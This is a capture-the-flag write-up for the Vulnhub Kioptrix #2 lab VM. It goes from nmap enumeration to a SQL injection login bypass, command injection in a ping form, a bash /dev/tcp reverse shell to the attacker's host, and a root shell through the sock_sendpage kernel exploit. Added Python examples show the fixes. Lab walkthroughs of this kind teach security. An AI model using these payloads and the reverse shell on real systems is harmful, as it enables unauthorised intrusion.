Vulnhub - Kioptrix #2 Writeup
Enumeration
Nmap
Nmap scan report for 192.168.71.129
Host is up, received arp-response (0.0056s latency).
Scanned at 2020-01-19 12:22:25 IST for 119s
Not shown: 994 closed ports
Reason: 994 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
| 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4j5XFFw9Km2yphjpu1gzDBglGSpMxtR8zOvpH9gUbOMXXbCQeXgOK3rs4cs/
j75G54jALm99Ky7tgToNaEuxmQmwnpYk9bntoDu9SkiT/hPZdOwq40yrfWIHzlUNWTpY3okTdf/YNUAdl4NOBOYbf0x/dsAdHHqSWnvZmruFA6M=
|_sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
443/tcp open ssl/https? syn-ack ttl 64
|_ssl-date: 2020-01-19T04:44:13+00:00; -2h09m12s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
631/tcp open ipp syn-ack ttl 64 CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:48:8C:63 (VMware)
Host script results:
|_clock-skew: -2h09m12s
That’s a lot of attack surface to cover. Let’s start with the web application on port 80.
Looks like a login page for administrators. We can try SQL injection to bypass the login.

We can bypass the login using either of the following as the username (with any password):

' or 1#
' or 1-- 

The second one needs a trailing space: MySQL only treats -- as a comment when it is followed by whitespace, so without the space the query fails with a syntax error instead of logging us in.

MySQL login code (can be found after getting a shell):

$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";

The single quote closes the string literal the application opened, or 1 makes the WHERE clause always true, and # (or -- ) comments out the rest of the statement, including the password check. Because $username and $password are interpolated straight into the query text, nothing stops our input from being parsed as SQL.
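The following is an added example, not code from the original writeup or from the Kioptrix VM. It rebuilds the page's PHP query in Python to show exactly what SQL text the payload produces, runs it against a constructed in-memory SQLite table standing in for the MySQL users table (SQLite is assumed here because it ships with Python; it understands the -- comment but not MySQL's #), and contrasts it with a parameterised query that the same payload cannot bypass. The table contents are made up.

```python
import sqlite3

# Constructed sample data standing in for the target's users table.
USERS = [("admin", "s3cret"), ("john", "letmein")]


def make_db():
    """In-memory SQLite stand-in for the MySQL database (assumption, not the VM's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return con


def build_query(username, password):
    """Mirrors the page's PHP line: values are pasted straight into the SQL text."""
    return ("SELECT * FROM users WHERE username = '%s' AND password='%s'"
            % (username, password))


def login_vulnerable(con, username, password):
    """Runs the string-built query; a non-empty result means the login succeeds."""
    return con.execute(build_query(username, password)).fetchall()


def login_safe(con, username, password):
    """Parameterised form: the input is bound as data and never parsed as SQL."""
    return con.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


if __name__ == "__main__":
    con = make_db()
    # Trailing space matters for MySQL's -- comment; SQLite accepts it either way.
    # The ' or 1# variant from the page is MySQL-only (# is not a comment in SQLite).
    payload = "' or 1-- "
    print(build_query(payload, "x"))          # shows the password check commented out
    print(login_vulnerable(con, payload, "x"))  # every row comes back: login bypassed
    print(login_safe(con, payload, "x"))        # []: payload treated as a literal username
```

The key point the printed query makes visible is that the password comparison is still in the string the application built, just dead text behind the comment marker; the fix is to stop building SQL out of user input, which the parameterised version does.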
Low Privilege Shell
Login has been successfully bypassed and we are presented with another page, asking for an ip address to ping.
We can inject any command here by appending a ; followed by our own command, since the address is handed straight to a shell. Unfortunately there was no netcat installed, but we can get a reverse shell using bash's built-in /dev/tcp redirection:
bash -i >& /dev/tcp/192.168.71.128/4444 0>&1
Don't forget to start an nc listener first. Note that the redirection in that one-liner is parsed by the shell that runs the injected command line (/bin/sh, which on CentOS is bash); on a system where /bin/sh is dash, wrap the whole thing in bash -c '...' instead.
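As an added example (not code from the writeup, and not the VM's actual PHP, which the page does not show), the following Python models the ping handler's flaw and the check that closes it. It assumes the handler concatenates the submitted address into a ping command line that a shell executes; the vulnerable function returns the string /bin/sh would receive, and the hardened one accepts only a literal IP address and builds an argv list so no shell is involved. The input strings are constructed for illustration.

```python
import ipaddress
import subprocess


def ping_command_vulnerable(target):
    """Assumed shape of the page's handler: user input pasted into a shell command.
    A ';' (or '|', '&&', backticks, $(...)) ends the ping and starts our command.
    Returns the string the shell would be asked to run."""
    return "ping -c 3 " + target


def parse_target(target):
    """Accept only a bare IPv4/IPv6 address; anything else raises ValueError."""
    return str(ipaddress.ip_address(target.strip()))


def ping_command_safe(target):
    """Validated address as its own argv element: no shell, so no metacharacters."""
    return ["ping", "-c", "3", parse_target(target)]


def is_injection_attempt(target):
    """True when the submitted value is not a plain IP address."""
    try:
        parse_target(target)
    except ValueError:
        return True
    return False


def run_ping(target):
    """Executes the hardened form. Needs network, so it is not exercised here.
    (On older systems IPv6 targets may need ping6 instead of ping.)"""
    return subprocess.run(ping_command_safe(target), capture_output=True, text=True)


if __name__ == "__main__":
    # Constructed payload in the spirit of the page's reverse shell.
    evil = "127.0.0.1; bash -i >& /dev/tcp/192.168.71.128/4444 0>&1"
    print(ping_command_vulnerable(evil))   # the whole line reaches /bin/sh
    print(is_injection_attempt(evil))      # True: rejected before any shell runs
    print(ping_command_safe("127.0.0.1"))  # ['ping', '-c', '3', '127.0.0.1']
```

Rejecting the input rather than trying to strip dangerous characters is deliberate: the set of shell metacharacters is large and shell-dependent, whereas "is this an IP address" has one exact answer.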
root@kali:~/Desktop/vulnhub/kioptix2# nc -lvp 4444
listening on [any] 4444 ...
192.168.71.129: inverse host lookup failed: Unknown host
connect to [192.168.71.128] from (UNKNOWN) [192.168.71.129] 49917
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
And we have a shell.
Low Priv Shell Enumeration
I spent a good amount of time snooping around looking for privilege escalation paths, but to no avail, so I finally started looking at kernel exploits. It is good practice to avoid kernel exploitation where possible: a failed exploit can crash or corrupt the machine. Make sure you have exhausted the other options before trying one.
Linux Exploit Suggester
We can use Linux_Exploit_Suggester.pl to find possible kernel exploits.
bash-3.00$ perl Linux_Exploit_Suggester.pl
Kernel local: 2.6.9
Searching among 65 exploits...
Possible Exploits:
[+] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408/
[+] exp.sh
[+] half_nelson
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/6851
[+] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787/
[+] krad
[+] krad3
Source: http://exploit-db.com/exploits/1397
[+] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150/
[+] py2
[+] sock_sendpage
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[+] sock_sendpage2
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[+] udp_sendmsg_32bit
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[+] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024/
I had to filter through these exploits and finally went with sock_sendpage() (CVE-2009-2692).
Root Shell
Transfer the code to the machine (I used a python HTTP server and wget), compile it and run it.
bash-3.00$ gcc -Wall sock.c
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
And we are root!